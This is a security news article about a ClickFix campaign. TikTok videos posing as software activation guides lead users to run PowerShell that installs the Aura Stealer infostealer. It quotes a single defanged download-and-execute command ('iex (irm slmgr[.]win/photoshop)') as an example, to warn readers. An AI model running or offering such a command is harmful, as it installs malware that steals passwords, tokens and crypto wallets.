A growing cybersecurity threat is emerging from one of the most popular social platforms on the planet — TikTok. According to new research, cybercriminals are exploiting TikTok videos disguised as free activation guides for popular software like Windows, Microsoft 365, Spotify, Adobe Photoshop, and Netflix to distribute information-stealing malware through a ClickFix attack technique.
Security researcher Xavier Mertens from the ISC identified the ongoing campaign, which mirrors a similar one documented by Trend Micro earlier this year. The videos promise free activation or “fixes” for paid software, tricking unsuspecting users into running malicious PowerShell commands that silently infect their systems.
How the ClickFix attack works
The ClickFix method is a social engineering attack designed to manipulate users into executing dangerous commands. In the malicious TikTok videos, hackers display a short PowerShell command on-screen and instruct viewers to run it as an administrator, supposedly to activate a legitimate program. The command typically follows this format:
iex (irm slmgr[.]win/photoshop)
The URL changes based on the software being impersonated. For instance, fake Windows activation videos would use “windows” instead of “photoshop” in the address. Once executed, this command directs PowerShell to connect to a remote domain (slmgr[.]win) and download another malicious script.
The malware behind the campaign
That secondary PowerShell script retrieves two executable files hosted on Cloudflare Pages. The first file, updater.exe, has been confirmed as a variant of Aura Stealer—a well-known infostealer malware. Once installed, Aura Stealer targets sensitive user data, including browser-stored passwords, cookies, authentication tokens, and cryptocurrency wallets. The stolen information is then exfiltrated to attacker-controlled servers, giving threat actors full access to victims’ digital identities.
The second file, source.exe, leverages .NET’s Visual C# Compiler (csc.exe) to compile and inject additional malicious code directly into system memory. While its exact purpose remains unclear, experts believe it could enable further persistence mechanisms or secondary payload deployment.
A widespread and growing trend
ClickFix-based malware distribution is becoming a popular technique among threat actors, particularly those involved in ransomware and crypto-theft operations. By embedding their campaigns in social media platforms like TikTok, attackers exploit the trust and reach of short-form video content to spread malware to non-technical audiences.
Mertens and other cybersecurity experts warn users to avoid copying and executing commands from online videos or forums, especially in PowerShell, macOS Terminal, or Linux shells. Even a single line of code can hand over complete control of a system to attackers.
Conclusion
The resurgence of ClickFix attacks on TikTok highlights the evolving sophistication of social engineering in the modern malware landscape. With platforms like TikTok serving as distribution hubs for Aura Stealer and other infostealers, users must remain vigilant, skeptical, and security-aware. Cyber hygiene — including avoiding suspicious content, verifying software sources, and maintaining up-to-date antivirus protection — remains the strongest defense against this growing threat.
